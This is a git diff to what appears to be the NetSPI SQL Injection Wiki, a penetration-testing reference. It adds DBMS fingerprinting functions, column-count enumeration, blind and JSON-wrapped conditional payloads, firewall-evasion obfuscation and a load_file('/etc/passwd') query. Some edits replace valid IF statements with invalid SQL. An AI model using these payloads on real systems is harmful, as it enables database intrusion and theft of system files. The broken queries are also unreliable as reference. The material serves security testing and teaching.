diff --git a/_data/injectionDescriptions.yml b/_data/injectionDescriptions.yml
index c0a8ee5..cdf039b 100644
--- a/_data/injectionDescriptions.yml
+++ b/_data/injectionDescriptions.yml
@@ -1,14 +1,14 @@
injectionDetection: Injections can be detected in a number of ways. The simplest being adding a ' or " after various parameters and getting a database error returned from the web server. The sections below describe where to find and how to detect these parameters.
dbmsIdentification: Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
errorBased: Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
-unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).
+unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
blindBased: Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
conditionalStatements: Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
injectionPlacement: SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
injectionObfuscation: Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.
-dataExfiltration: Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various Layer 4 requests, and hidden techniques.
+dataExfiltration: Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.
dataTargeting: Being able to properly target and identify sensitive information can exponentially decrease time spent in a database. This means less time spent poking around and more time spent researching other vectors.
-executingOSCommands: Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
+executingOSCommands: Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
informationGathering: It is often valuable to gather information about any testing environment; version numbers, user accounts, and databases all help in escalating vulnerabilities. Below are common methods for this.
lateralMovement: Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.
privilegeEscalation: Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.
diff --git a/assets/images/facebookCard.jpg b/assets/images/facebookCard.jpg
index 35fd767..d319612 100644
Binary files a/assets/images/facebookCard.jpg and b/assets/images/facebookCard.jpg differ
diff --git a/assets/images/favicon.ico b/assets/images/favicon.ico
new file mode 100644
index 0000000..99ae406
Binary files /dev/null and b/assets/images/favicon.ico differ
diff --git a/assets/images/logo.png b/assets/images/logo.png
new file mode 100644
index 0000000..a637522
Binary files /dev/null and b/assets/images/logo.png differ
diff --git a/assets/images/twitterCard.jpg b/assets/images/twitterCard.jpg
index c4802f7..273e053 100644
Binary files a/assets/images/twitterCard.jpg and b/assets/images/twitterCard.jpg differ
diff --git a/attackQueries/dataTargeting/oracle.html b/attackQueries/dataTargeting/oracle.html
index e8079c8..05a5b25 100644
--- a/attackQueries/dataTargeting/oracle.html
+++ b/attackQueries/dataTargeting/oracle.html
@@ -21,7 +21,7 @@ Data Targeting queries
SELECT * FROM session_privs
SELECT * FROM USER_SYS_PRIVS
SELECT * FROM USER_TAB_PRIVS
SELECT * FROM USER_TAB_PRIVS_MADE
SELECT * FROM USER_TAB_PRIVS_RECD
SELECT * FROM ALL_TAB_PRIVS
SELECT * FROM USER_ROLE_PRIVS
|
- | Extracting stored procedure/Java sources |
+ Extracting Stored Procedure/Java Sources |
SELECT * FROM all_source WHERE owner NOT IN ('SYS','SYSTEM')
SELECT * FROM all_source WHERE TYPE LIKE '%JAVA %'
SELECT TO_CHAR(DBMS_METADATA.get_ddl('TABLE','DEPT','CONSUELA')) FROM dual |
diff --git a/attackQueries/executingOSCommands/index.html b/attackQueries/executingOSCommands/index.html
index 3e884f9..9a677c9 100644
--- a/attackQueries/executingOSCommands/index.html
+++ b/attackQueries/executingOSCommands/index.html
@@ -1,6 +1,6 @@
---
layout: tab
-description: Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS.
+description: Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS.
keywords: os command, operating system command, command injection
title: OS Commands | NetSPI SQL Injection Wiki
tabs:
diff --git a/attackQueries/executingOSCommands/mysql.html b/attackQueries/executingOSCommands/mysql.html
index b5cd81f..a483190 100644
--- a/attackQueries/executingOSCommands/mysql.html
+++ b/attackQueries/executingOSCommands/mysql.html
@@ -18,6 +18,9 @@ Executing OS Commands Through MySQL
Command Execution with MySQL CLI Access |
https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ |
+
+ | Traversing directories (Linux) |
+ SELECT load_file("/etc/passwd") from information_schema |
diff --git a/dbmsIdentification/mysql.html b/dbmsIdentification/mysql.html
index 11a03a4..703c2a5 100644
--- a/dbmsIdentification/mysql.html
+++ b/dbmsIdentification/mysql.html
@@ -21,6 +21,12 @@ DBMS Identification
String concatenation |
page.php?id=' 'mysql' -- |
+
+ | Functions |
+ connection_id() --
+ row_count() --
+ POW(1,1) -- |
+
Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.php?id=' |
diff --git a/dbmsIdentification/oracle.html b/dbmsIdentification/oracle.html
index 9c91778..b67d2c9 100644
--- a/dbmsIdentification/oracle.html
+++ b/dbmsIdentification/oracle.html
@@ -13,6 +13,10 @@ DBMS Identification
| String concatenation |
page.jsp?id='||'oracle' -- |
+
+
+ | Functions |
+ BITAND(1,1) -- |
| Default table |
diff --git a/dbmsIdentification/sqlserver.html b/dbmsIdentification/sqlserver.html
index ff0fa93..5bb7655 100644
--- a/dbmsIdentification/sqlserver.html
+++ b/dbmsIdentification/sqlserver.html
@@ -18,6 +18,16 @@ DBMS Identification
Default variable |
page.asp?id=sql'; SELECT @@SERVERNAME -- |
+
+ | String concatenation |
+ page.php?id='mssql'+'mssql' -- |
+
+
+ | Functions |
+ @@rowcount --
+ SQUARE(1) --
+ @@pack_received -- |
+
Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.asp?id=' |
diff --git a/detection.html b/detection.html
index 5013907..7feeff2 100644
--- a/detection.html
+++ b/detection.html
@@ -93,7 +93,8 @@ Detecting Injections
| Arithmetic |
- product.asp?id=1/1 -- true
product.asp?id=1/0 -- false |
+ product.asp?id=1/1 -- true
product.asp?id=1/0 -- false
+ product.asp?id=1/abs(1) -- true
product.asp?id=1/abf(1) -- false |
Blind based
Note: Detecting blind injection may require identification or guess-and-check of the DBMS to find the proper timing function. |
diff --git a/injectionTechniques/conditionalStatements/mysql.html b/injectionTechniques/conditionalStatements/mysql.html
index 7d79baa..2c5e5e6 100644
--- a/injectionTechniques/conditionalStatements/mysql.html
+++ b/injectionTechniques/conditionalStatements/mysql.html
@@ -14,9 +14,17 @@ Conditionals
If/Else |
SELECT IF(1=2,'true','false') |
+
+ | If/Else (json) |
+ {"id"="xxx AND IF(length(database())=’1’, SLEEP(15),1)#”}
If the database name's length is 1, database gets unresponsive with given miliseconds |
+
| Logical OR |
SELECT 1 || 0
To see nuances of this operator go here |
+
+ | AND (json) |
+ {"id"="xxx AND 1=1#"}
True statement
{"id"="xxx AND 1=2#"}
False statement |
+
-
\ No newline at end of file
+
diff --git a/injectionTechniques/conditionalStatements/sqlserver.html b/injectionTechniques/conditionalStatements/sqlserver.html
index 5c978c5..95481ed 100644
--- a/injectionTechniques/conditionalStatements/sqlserver.html
+++ b/injectionTechniques/conditionalStatements/sqlserver.html
@@ -12,7 +12,7 @@ Conditionals
| Case |
- SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END |
+ SELECT * FROM CASE WHEN 1=1 THEN 1 ELSE 0 END |
| If/Else |
diff --git a/injectionTechniques/obfuscation/mysql.html b/injectionTechniques/obfuscation/mysql.html
index 0dcf1e0..3406d66 100644
--- a/injectionTechniques/obfuscation/mysql.html
+++ b/injectionTechniques/obfuscation/mysql.html
@@ -26,6 +26,10 @@ Obfuscating Queries
Hex > Int |
SELECT 0x20 + 0x40 |
+
+ | Unhex/hex |
+ unhex(hex(user())) |
+
| Bitwise AND |
SELECT 6 & 2 |
@@ -72,7 +76,11 @@ Obfuscating Queries
| Single line comment |
- SELECT 1 -- comments out rest of line
SELECT 1 # comments out rest of line |
+ SELECT 1 -- comments out rest of line
SELECT 1 # comments out rest of line
SELECT 1 --+ - Comments out rest of the line
SELECT 1 --+- - Comments out rest of the line
SELECT 1 -- - - Comments out rest of the line
SELECT 1 %00 - Comments out rest of the line |
+
+
+ | In-line comment |
+ SEL/*_*/ECT * FR/*_*/OM |
| No Spaces |
@@ -94,6 +102,10 @@ Obfuscating Queries
Invalid Percent Encode |
%SEL%ECT * F%R%OM U%S%ERS |
+
+ | character obfuscation |
+ SeLeCt * FrOm |
+
diff --git a/injectionTypes/blindBased/mysql.html b/injectionTypes/blindBased/mysql.html
index 874da01..3bd5d9c 100644
--- a/injectionTypes/blindBased/mysql.html
+++ b/injectionTypes/blindBased/mysql.html
@@ -64,11 +64,11 @@ Full-Blind
| User is root (Benchmark method) |
- SELECT IF(user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) |
+ SELECT * from (user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) |
| Version is 5.x.x |
- SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null) |
+ SELECT * from (SUBSTRING(version(),1,1)=5,SLEEP(5),null) |
diff --git a/injectionTypes/errorBased/mysql.html b/injectionTypes/errorBased/mysql.html
index 15b7f7d..53debef 100644
--- a/injectionTypes/errorBased/mysql.html
+++ b/injectionTypes/errorBased/mysql.html
@@ -11,6 +11,24 @@ Error Based
+
+ | Amount of columns using ORDER BY |
+ ORDER BY 1
+
+ Add this at the end of your query
+ If you get no error you know ordering is working
+ Increment the number from 1 until you get an error. Then you know the amount of columns for this table
+ |
+
+
+ | Amount of columns using UNION SELECT |
+ UNION SELECT 1,2
+
+ Add this at the end of your query
+ Add increment until you see a valid response, e.g. UNION SELECT 1,2,3
+ If you get no error you know union select is working. You can try to find the values on the page to see where the output goes.
+ |
+
| XML Parse Error |
SELECT extractvalue(rand(),concat(0x3a,(select version()))) |
diff --git a/misc/contributors.html b/misc/contributors.html
index d8e390b..91de41b 100644
--- a/misc/contributors.html
+++ b/misc/contributors.html
@@ -16,4 +16,7 @@ Special thanks to our contributors:
Khai Tran (@k_tr4n)
Rafael Seferyan
Scott Sutherland (@_nullbind)
+ Sachin Wagh (@tigertigerboy07)
+ Anurag Kumar (@anukaal)
+ Matthias Altmann (@secf00tprint)
diff --git a/misc/sandboxes/sqlserver.html b/misc/sandboxes/sqlserver.html
index 4dd579d..1cbbf8b 100644
--- a/misc/sandboxes/sqlserver.html
+++ b/misc/sandboxes/sqlserver.html
@@ -3,5 +3,4 @@ Sandboxes
Some useful online sandboxes for testing queries can be found below:
http://sqlfiddle.com/
https://turbo.net/sql
- https://sqlzoo.net/
- http://www.headfirstlabs.com/sql_hands_on/
+ https://sqlzoo.net/